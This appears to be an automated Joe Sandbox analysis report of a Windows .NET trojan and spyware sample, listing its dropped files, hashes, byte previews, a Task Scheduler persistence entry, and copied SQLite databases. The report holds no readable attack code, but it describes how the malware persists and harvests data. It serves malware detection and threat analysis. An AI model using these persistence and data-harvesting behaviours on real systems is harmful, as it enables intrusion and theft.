                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 8m 46s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:w4XFffGDz1.exe
                      renamed because original name is a hash value
                      Original Sample Name:2185ecde5380054ad075b7a25ae0ea51.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@22/104@2/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 99%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, Microsoft.Photos.exe, SIHClient.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Created / dropped Files have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                      • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      TimeTypeDescription
                      14:22:03API Interceptor34x Sleep call for process: PO.exe modified
                      14:22:09API Interceptor37x Sleep call for process: powershell.exe modified
                      14:22:13API Interceptor45x Sleep call for process: AJzHYZtQIb.exe modified
                      14:22:13API Interceptor1x Sleep call for process: w4XFffGDz1.exe modified
                      20:22:11Task SchedulerRun new task: AJzHYZtQIb path: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      No context
                      No context
                      No context
                      No context
                      No context
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):1216
                      Entropy (8bit):5.34331486778365
                      Encrypted:false
                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:modified
                      Size (bytes):2232
                      Entropy (8bit):5.379552885213346
                      Encrypted:false
                      SSDEEP:48:fWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:fLHxvCZfIfSKRHmOugw1s
                      MD5:236CE6553B5DB20FA0B07F9FEA88F4A4
                      SHA1:AEB5B156162EC5CD4E0BC3A0BA0F0D4739D40DBD
                      SHA-256:3849E9437770B9804D942D293FFAB3C6449B82BA23C0CD3D48DE2C318938FCAD
                      SHA-512:90B07AFD72EE353BEA8E2C7ECBB8CDAFB965C91E1B32C5FFE971F60C69004FDEBF5BA429B4DD455210772D2494A8AD60930A8F01C289D0199998A7CC36050FD6
                      Malicious:false
                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                      Process:C:\Users\user\Desktop\w4XFffGDz1.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):743944
                      Entropy (8bit):7.615457036874597
                      Encrypted:false
                      SSDEEP:12288:Sxtg61jjk0LAta9A15fraDI+Jpaf6F+CfdGoZ8LFCSz4vtwD/zxmkR:wg61jjk0LAta9A+DIMaf6MCF18LXz
                      MD5:86F98523CEB67DF5CC3431A839F63134
                      SHA1:160A60824E1ADC4C0FFD5959341C6DAE4DA2E76B
                      SHA-256:0E43D560502493DFADE28C5822081232EE47FD42C233F9FF473C467E51297E27
                      SHA-512:CD6D79DBF6E8EC3663570F584760DB9AC50E190B4CC6E12630CB31796A88912B26556B08E01E803D3EC06874263FBDEB9AC73C8C5CD67E2749D32EBA7A23C7B7
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 88%
                      • Antivirus: Virustotal, Detection: 58%, Browse
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'.gf..............0..............#... ...@....@.. ....................................@.................................."..O....@..L............$...6...`....................................................... ............... ..H............text........ ...................... ..`.rsrc...L....@......................@..@.reloc.......`......."..............@..B................."......H.......P...."..........P...p+...........................................0..\........(.....(.....{....r...po.....{....r...p(.......(.......(....rC..p(....o.....{....r...po....*br...p( ...&.{.....o!...*..("...*z.,..{....,..{....o#.....($...*.0...........s%...}.....s&...}.....s'...}.....s(...}.....s%...}.....{....o)....(*....{.....o+....{....r-..p"..@A.. ....s,...o-....{.... ......s....o/....{....r?..po0....{.....9..s1...o2....{.....o3....{....rU..po.....{.....o+....{....r-..p"
                      Process:C:\Users\user\Desktop\w4XFffGDz1.exe
                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 390x552, components 3
                      Category:dropped
                      Size (bytes):49161
                      Entropy (8bit):7.9640442162988965
                      Encrypted:false
                      SSDEEP:768:LWTHytOtCeYfsfd8HAeA5Sz8Q3X1taN5adCKWEnMAyk8n/syo:qTj7Yfsfd8Ha5Sz/nHaN5adrlYsf
                      MD5:E83CCB51EE74EFD2A221BE293D23C69A
                      SHA1:4365CA564F7CDD7337CF0F83AC5FD64317FB4C32
                      SHA-256:DA931852A19A707D01C3EDF138622B8601056C42525F8AC40CB48AF43A7410CC
                      SHA-512:0252E629FBDAFDB66FF63EF76D18F25D1CA46AC3EFF019F012361DB45EBD34D1A7A9AD35F7A2FC5830676C771997633F3ABF1DC3224BD8F6BD55456B0A554A46
                      Malicious:false
                      Preview:......JFIF.....`.`.....C....................................................................C.......................................................................(...."................................................................................`...4....0CI.#..!..i..`..!..i..`..!..i..`..!..i..`..!..i..`....f.....8q.+..k...8..............\4..V^..._....o.....S..6......C?......../.;..G.~...J}fw..o.).B..S~..l..o...?|.]...'/...@...7...+.........>..}#..7.......n....+4_.......c].;....J%Ye}....c.3...-..O..[y.!../@......f.....0....#p....|u.2.Yc[.%v.[.?..P.=K..D.,z.zN.......(...._Qv..i.........7...+..l.doY.z.E...%7..._.6..sU.;k-.:K.H.i.Y.........B...Q...IZ..SR..R........U..0y.&l^.}...X.3Q.s3..#=.....].6&...Z6..i...e"K..&C...<...>....?..........-%...\;p.....7_..............:r..B.8....p...4...[.eN..e.P...+.^......bB..Y...>?l.wIlr.KG.L..`.....$z..FTu....`....u.{.@.......4.iK.OQ.......R-.(.g?%...................>;F......L+d.......m.S.+`...h3.v#.a.P.......
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):98304
                      Entropy (8bit):0.08235737944063153
                      Encrypted:false
                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
